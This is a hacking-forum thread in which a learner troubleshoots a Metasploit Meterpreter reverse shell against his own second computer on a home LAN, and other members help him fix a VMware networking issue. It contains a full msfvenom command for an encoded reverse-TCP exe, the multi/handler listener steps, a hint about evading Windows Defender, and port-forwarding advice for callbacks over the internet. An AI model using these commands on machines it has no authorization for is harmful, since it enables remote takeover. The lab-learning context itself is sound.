Forum Thread: Not Able to Open a Session.

Good afternoon Null-Byte,

I'm fairly new at this and have basic Linux skills but I learn fast and feel that I have done my due diligence to try to fix this on my own.. but I've hit a brick wall and I need your help, if you deem me worthy of it.

Now, to the problem at hand.

I have physical access to a 2nd computer that I'm trying to install a listener on but no matter what method I use or how vulnerable I make it, I can never get Meterpreter to open a session.

I disabled all protection on the target computer for simplicity's sake and followed master OTW's tutorial and used "adobe pdf embedded exe" but after checking the exploit database I realized it might not work on Windows 8.1.

Then I tried a "java signed applet" tutorial I found but that didn't work either, maybe because it targets x86 while my target has x64. No biggie, next vulnerability.

Off to try "java rhino"! Seems to target all the right things. I installed all the vulnerable programs, sent it.. nothing.

At this point I was thinking I'm messing up some early steps, came back here and double, triple, quadruple-checked everything but it was all in order.

Then I completely removed all antivirus and firewalls from the target and used . Still nothing.

My latest attempt was creating a straight up .exe through msfvenom and see if that would work but still no session.

My limited troubleshooting skills included:
Making sure the host was listening.
Tried and re-tried all previous exploits on several different ports, 20, 80, 443 and the default 4444.
Re-install Kali.
Tried encoding it.
Pinged the hell out of both target and host.

And just for the hell of it, I installed Kali on the target computer and tried creating the listener from there to see if there was something wrong with my computer.

I feel like I'm missing something very simple that is right in front of my eyes and I'd greatly appreciate any and all help on the matter.

Ulf

13 Responses

You are probably missing something. Usually, the straight .exe should work out of the box. You haven't mentioned if you are in LAN or WAN. Also, please share with us the exact options you are using to run the exploit.

You may want to check the port forwarding on your home router if you haven't already. The connection might not be routing back to you correctly?

Don't use any encoder... no iterations too... no exploit... just a plain simple exe... try that...;);)

@CIUFFY: In a LAN. When I did the .exe exploit I used this command line "msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.164.220 LPORT=20/80/443/4444 -f exe -e x86/shikata ga nai -i 10 > exploit.exe" Also tried it without the encoder since there's AV anymore.

According to the video tutorial I looked at I also did in another tab
"use exploit/multi/handler
set payload windows/meterpreter/reverse tcp
set lhost 192.168.164.220
set lport 20/80/443/4444
exploit"

Removed the underscores and noted all the ports I've used for the exploits.

@LEO: Been trying to and I almost feel as if that's the source of my issues, the building I live in has a fiber optic internet and there's no standard router to speak of. No luck trying to access the Default Gateway IP either. Maybe a call to my ISP is in order.

If you are in LAN you don't need port forwarding. Any port should work.
Very simple: can you even ping the victim machine?

Forgive me if this is an extremely noobish question, LAN vs WAN? From what I know I'm on a LAN, both computers on the same network inside my apartment and all that. No complicated stuff.

Yup, I can ping the victim.. but.. I just reversed it and the target can't ping me back, neither my windows or Kali through VMware. Kinda makes sense now why I never receive a session. Like I said, it was something simple. Gonna see if I can sort that out and then come back, thanks CIUFFY.

Glad I could help. LAN is local area network, usually controlled by a router and refers to itself with 129.168.1.x, while WAN is wide area, basically, the internet, in short two computers on different LANs.

Solved! Thanks Ciuffy, Leo and Se7enpeace for your comments and help!

After I noticed I couldn't ping back to the host I messed around some with my internet settings and Firewall. Made some adjustments which allowed me to ping my Windows but not Kali. Then I changed the network settings in VMware from NAT to Bridged which, for some reason, made it so I couldn't ping windows but Kali got a new IP and was pingable. Made a new exploit and.. Voilà! "Meterpreter Session 1 opened.. "!

Couldn't have done it without you guys, was way too simple for me to notice on my own.

Thanks again,
Ulf

Glad to see you solved the problem. Good luck with your exploit training :)

sob... it's se7enpeace...
Haha jk;);)..

Glad you got it working ;P

Glad you were able to solve it. BTW idk what browser you used for the java applet, but if it was chrome that may have been your problem. Not to hijack a thread but I have a question about the WAN. If you don't use an encoder, don't be surprised if windows defender prevents execution of your exe

When you open a port on your computer, say 192.168.1.111 (on the LAN), does that open the port on your public IP?

For port forwarding, it asks for a starting port and destination port. So if the starting port was 7777 and the destination port was 8000, would I set the lport to the 7777 and my router would forward it to my machine? Then would I have the listener on 8000?

Never really experimented with WAN stuff.

Basically: ports exist to identify computers in a LAN from the WAN.

If your listener is running on your computer, when the exploit gets executed it connects back to your public IP (router), but how to redirect the connection to your computer? You forward port 7777 to your computer's LAN IP, so that by specifying port 7777 in the payload, the connection goes through the router and then to the computer which is hosting the listener.

Thank you. That's what I thought. I just don't understand what the point of a destination port is. If the port forwarding tab on my router requests the IP to which the port will be forwarded, why do I need to specify a destination port? Did my above-mentioned setup not work?
